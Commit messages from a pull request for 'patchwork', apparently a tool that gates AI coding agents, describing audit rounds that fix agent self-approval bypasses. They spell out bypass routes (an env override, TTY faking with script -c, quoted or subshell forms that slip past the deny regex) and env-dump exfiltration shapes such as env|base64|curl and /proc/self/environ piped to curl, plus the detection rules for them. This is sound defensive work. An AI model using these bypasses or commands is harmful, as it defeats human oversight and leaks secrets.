- New "Shipped" entry for v0.6.11 linking to the threat-model
and migration guides.
- Retro entry noting the v0.6.10 cross-vendor security audit
(28 findings → 22 fixed) was deferred from earlier.
The existing docs/hook-coverage.md is auto-generated from the tool
registry; regenerated against the current tree but no diff (the
registry hasn't changed since commit 1).
No code change; tests unchanged at 1439.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
R2 ship-check verdict was NEEDS_REWORK with 4 ship-blocking findings.
This commit closes all four.
R2-001 + R2-002 CRITICAL — Agent could self-approve / self-declassify.
GPT-5.5 noted that my "live evidence the system works" example —
the agent's git push being denied then approved — failed to
observe that THE AGENT could run `patchwork approve <id>` itself.
The deny message literally surfaced the exact command. Same with
`patchwork clear-taint` and `patchwork trust-repo-config '**'`.
The argv doesn't contain `.patchwork`, so the existing
system-policy regex denies didn't trigger. Defeats the human gate.
Fix: new requireHumanContext() helper at
packages/cli/src/lib/require-human-context.ts. Refuses execution
when stdin or stdout isn't a TTY. PATCHWORK_HUMAN_CONTEXT=1 env
override exists for scripted-but-trusted contexts (must be set by
the user up-front, not by the agent at runtime). Applied to all
three admin commands.
The PreToolUse deny message also changes — instead of
"Run: patchwork approve <id>", it now reads
"Ask the human user to run `patchwork approve <id>` in their own
terminal, then retry." Agent visibility into the verbatim command
is no longer security-relevant because the CLI itself refuses
agent invocation.
R2-003 HIGH — Repo-controlled trust config could opt itself in.
My commit-9 `trust-repo-config` wrote `<cwd>/.patchwork/policy.yml`
with trusted_paths. A hostile repo could commit that file with
`trusted_paths: ['**']` and silence the taint engine entirely.
Fix: trust config moved to USER-LEVEL
`~/.patchwork/trusted-repos.yml`, keyed by repo absolute path. A
new `@patchwork/agents` module `trust-store.ts` owns the loader
and the CLI imports from it. The adapter's mergeTrustedPaths
reads from there only — project `.patchwork/policy.yml` is no
longer consulted for trust decisions. PolicySchema.trusted_paths
remains (system policy can still set globally trusted paths) but
the project-local override is gone.
R2-004 HIGH — A2 env|base64|curl exfil was treated as v0.6.12 gap.
GPT-5.5 pointed out this isn't really a URL-allowlist gap; it's a
recognizable env-dump-to-network pattern with no URL allowlist
needed.
Fix: dangerous-shell-combos.ts now detects env-dump argv heads
(env, printenv, set, export -p, declare -p/-x) and emits
direct_secret_to_network when combined with any egress kind on
the same parsed tree. A2 release-gate test flipped from
"documented gap, expect allow" to "expect DENY."
Tests: 1439 → 1450 (+11).
- 5 dangerous-shell-combos R2-004 tests (env|curl, env|base64|curl,
printenv|nc, env|wc-l negative, curl-alone negative)
- 5 require-human-context tests (TTY ok, no-stdin-TTY refuses,
no-stdout-TTY refuses, env override bypasses, env-not-"1" rejected)
- 1 R2-003 adapter test pinning that a hostile repo's
.patchwork/policy.yml is ignored
- A2 release-gate test updated
- trust-repo-config adapter tests updated for user-level storage
REVIEWS/2026-05-12-gpt55-v0.6.11-impl-audit-round2.{json,prompt.txt}
archived. fix-status doc to follow in the next commit alongside the
R3 verification audit.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
R3 verdict was NEEDS_REWORK with 3 findings. This commit closes them.
R3-001 CRITICAL — Human-context gate remained agent-bypassable.
GPT-5.5 R3 observed that `PATCHWORK_HUMAN_CONTEXT=1 patchwork
approve <id>` is a direct self-approval bypass available to the
same Bash tool the agent controls. Stdin/stdout TTY-ness isn't a
strong human-presence primitive either — `script -q -c '...'`,
`expect`, and pty allocation can pass it.
The honest answer is that same-UID = same-UID. Anything the user
can do from their shell, the agent can also do from its Bash
tool. No purely in-process check survives that constraint.
Fix shifts the boundary one layer out:
1. Remove the PATCHWORK_HUMAN_CONTEXT env override entirely.
It was theatrical — the agent runs in the same env it sets.
The override is gone; the TTY check is kept ONLY as
defense-in-depth (it costs nothing).
2. Add a system-policy regex deny in docs/default-policy.yml
for `patchwork approve`, `patchwork clear-taint`,
`patchwork trust-repo-config`. The regex catches the bare
form, wrapped forms (`env X=1 patchwork ...`,
`/usr/local/bin/patchwork ...`), and `script -c 'patchwork...'`.
This deny runs in the PreToolUse hook BEFORE the agent's Bash
subprocess spawns. /Library/Patchwork/policy.yml is
root-owned so the agent cannot rewrite it.
3. Document the residual honestly in v0.6.11/threat-model.md
under "Same-UID approval boundary". v0.6.12 plans a
root-owned out-of-band approval daemon that the agent
process literally cannot reach.
R3-002 MEDIUM — `set` was flagged as env-dump for any invocation.
Regression in the R2-004 fix: `ENV_DUMP_HEADS` included `set`
and `isEnvDump` returned true for any `set` invocation, so
`set -euo pipefail; curl ...` (a defensive shell prologue with
network access) was misclassified as `direct_secret_to_network`.
Fix: `set` only counts as an env dump when bare (argv.length === 1).
`set -e`, `set -u`, `set -o pipefail`, `set -euo pipefail` are
option-setting only.
R3-003 HIGH — Env-dump detector missed obvious variants.
R2-004 caught `env`, `printenv`, `set`, `export -p`, `declare -p/-x`
but missed widely-used equivalents:
- `cat /proc/self/environ` and `/proc/$$/environ` / `/proc/<pid>/environ`
- `tr '\0' '\n' </proc/self/environ` (stdin redirect form)
- `compgen -e` (bash)
- `typeset -p` / `typeset -x` / `typeset -px` (ksh/zsh)
- `readonly -p`
- `declare -px` / `declare -xp` (combined flags)
Fix: extended `isEnvDump` to recognize:
- any argv element matching `/proc/(self|$$|<pid>)/environ`
- any stdin/herestring redirect TO such a path
- the new heads (compgen -e, typeset -p/-x/-px, readonly -p)
- combined declare/typeset flags -px and -xp
Language-level forms (`python -c 'import os; print(os.environ)'`,
Node/Ruby equivalents) are deferred to v0.6.12 formal source
modeling, as the audit accepted.
Tests: 1450 -> 1460 (+10).
- 3 R3-002 tests (set -euo pipefail not env-dump, set -e not
env-dump, bare set IS env-dump)
- 7 R3-003 tests (/proc/self/environ + curl, stdin redirect,
compgen -e, typeset -p, readonly -p, declare -px, /proc/<pid>
alone is not exfil without egress)
- 2 require-human-context tests rewritten to assert env override
DOES NOT bypass (was: asserting bypass works)
REVIEWS/2026-05-12-gpt55-v0.6.11-impl-audit-round3.{json,prompt.txt}
included. R4 verification audit to follow.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
R4 verdict was NEEDS_REWORK with 2 ship-blockers. Both closed.
R4-001 CRITICAL — Admin CLI deny regex missed quoted PTY wrappers.
R3 shipped `(^|[ ;&|]|/)patchwork...` as the system-policy regex
to refuse agent invocations of `patchwork approve|clear-taint|
trust-repo-config`. GPT-5.5 R4 observed correctly that the left
boundary `[ ;&|]|/` does NOT match when `patchwork` is preceded
by a quote, paren, backtick, tab, or newline — so:
script -q -c 'patchwork approve <id>' # ' before patchwork
(patchwork approve <id>) # ( before patchwork
$(patchwork approve <id>) # ( before patchwork
`patchwork approve <id>` # ` before patchwork
...all bypassed the deny. Combined with `script` allocating a PTY,
the residual TTY check inside the CLI also passes. R3-001 is
reopened.
Fix: broadened the left boundary to `[^A-Za-z0-9_-]` (any char
that is not part of an identifier or path-name token). The final
regex is:
(^|[^A-Za-z0-9_-])patchwork[ \t]+(approve|clear-taint|trust-repo-config)\b
The trailing `\b` plus the required `[ \t]+` continues to prevent
false positives on `patchwork-foo approve`, `patchworkapprove`,
`npm install @patchwork/cli`, etc.
New file: packages/core/tests/policy/admin-cli-deny.test.ts —
20 unit tests that drive evaluatePolicy() with the same regex
and assert it denies the bypass shapes (script -c, $(...),
backticks, subshells, tab-separated, bash -c, sh -c, chained
with `;`/`|`) AND does NOT false-positive on `patchwork status`,
`patchwork-foo approve`, `patchworkapprove`, bare `approve`,
or `npm install @patchwork/cli`.
R4-002 HIGH — Proc-environ detector missed aliases.
R3-003 added `/^\/proc\/(self|\$\$|\d+)\/environ$/`. GPT-5.5 R4
noted obvious same-family aliases not covered:
/proc/thread-self/environ # current thread (Linux)
/proc/$BASHPID/environ # bash subshell pid (literal)
/proc/${BASHPID}/environ # same, braced form
/proc/$PPID/environ # parent pid
Fix: broadened PROC_ENVIRON_RE to `/^\/proc\/[^\/]+\/environ$/`.
Any single non-empty path component between /proc/ and /environ
is now treated as an env source. The false-positive cost is
essentially nil: /proc/<X>/environ paths exist only for processes
and threads on Linux.
3 new R4-002 tests in dangerous-shell-combos.test.ts:
- cat /proc/thread-self/environ | curl ... → DENY
- cat /proc/$BASHPID/environ | curl ... → DENY
- cat /proc/$PPID/environ | curl ... → DENY
Tests: 1460 -> 1483 (+23).
- 20 R4-001 admin-cli-deny policy regex tests
- 3 R4-002 /proc alias env-dump tests
REVIEWS/2026-05-12-gpt55-v0.6.11-impl-audit-round4.{json,prompt.txt}
included. R5 verification audit to follow.
Note: the system-policy deny only takes effect once the regex is
also added to the live /Library/Patchwork/policy.yml on each
machine — until then the TTY check inside the CLI is the only
gate. A `patchwork init --upgrade` migration step is needed before
tag; tracked separately.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
No description provided.